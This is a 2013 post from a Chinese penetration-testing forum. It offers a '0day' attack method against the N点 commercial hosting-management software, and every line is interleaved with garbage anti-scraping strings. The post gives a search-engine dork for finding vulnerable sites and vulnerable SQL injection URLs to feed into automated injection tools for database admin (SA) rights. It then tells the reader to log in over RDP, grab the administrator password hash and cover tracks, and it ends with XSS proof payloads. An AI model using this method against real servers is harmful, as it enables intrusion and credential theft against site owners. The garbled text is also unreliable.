中国网络渗透测试联盟

标题: N点商业版漏洞通杀0day以及利用方法 [打印本页]

作者: admin    时间: 2013-3-3 08:06
标题: N点商业版漏洞通杀0day以及利用方法
不得不说N点实在是一个破东西
& ^9 C' G7 f/ o! `! s  ^就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂$ m# ?1 h* T9 u* z# V$ F
好吧 抱怨一下就行了  接下来关键的时候到了
& m; U: C" O8 [, g+ @* _7 j首先百度搜索关键字:inurl: (mmdatabase.asp)
5 N6 M: J. k. v% J$ P9 }1 n9 w; ^我随便列举一个:   www.xxxx.com5 n8 `6 D  b( u: F7 A( S) \3 @
修改链接:http://www.xxxx.com:80/Style/new ... &RID=1&ID=1: W. S* q1 \% z) e! J( X
扔入NBSI 或者啊D等各种傻逼工具后
) ~8 U) |1 E. p$ j$ F$ `2 }6 Y你们会看到是SA权限
/ j, u  T) w' f' I+ K果断3389 上去  hash得到administrator密码
7 p! q' @% n6 k擦屁股走人~7 E; c: w: D* q: N) H5 ^: y  H
经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的
3 ?, i# Y' Z& \( h8 b5 C% b4 o
# ?6 H  ?4 F) W1 e+ e再附上其他几个漏洞页面( n# b# E& B) a# B# C* g* m4 j- }
SQL:
, X0 r1 e( @( mhttp://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=1% Y9 O2 G* y3 F. c' x0 d" P
http://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=11- ~: c+ s: b( t$ n  E  L
http://www.xxxxxx.com:80/Manage/ ... login.asp&PID=9
* c$ X8 v( K# {) H( d6 O0 r0 Thttp://www.xxxxxx.com:80/Style/vhosting.asp?classID=2( W4 _. ^+ x+ i; y
XSS证明:; l$ [* q/ o8 P! G( H- |* w( v* K
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”7 M7 \1 Y9 R7 R  F0 ?6 B
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”# V* K$ S) F" D
http://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn<script>alert(42873)</script>
% Q& A4 o8 o9 s  q$ h) b) m. ^- j由此可见点就是坑逼中的战斗机   自从用了他我的眼泪都流干了  有做IDC的朋友千万别步我后尘啊   便宜没好货好货不便宜
+ P1 L% N) ]& y; Y" A还是星外吧  你们懂的
9 {; P% c) O1 ?: V作为一个商用程序   安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?
& c2 E9 z4 f9 M6 e* `PS:其实我真的很想知道你说N点这SB asp就asp吧  为什么asp还非要MSSQL  这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。   o(︶︿︶)o 唉0 U3 u; y; V0 Z' p: J3 s- q
——-




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2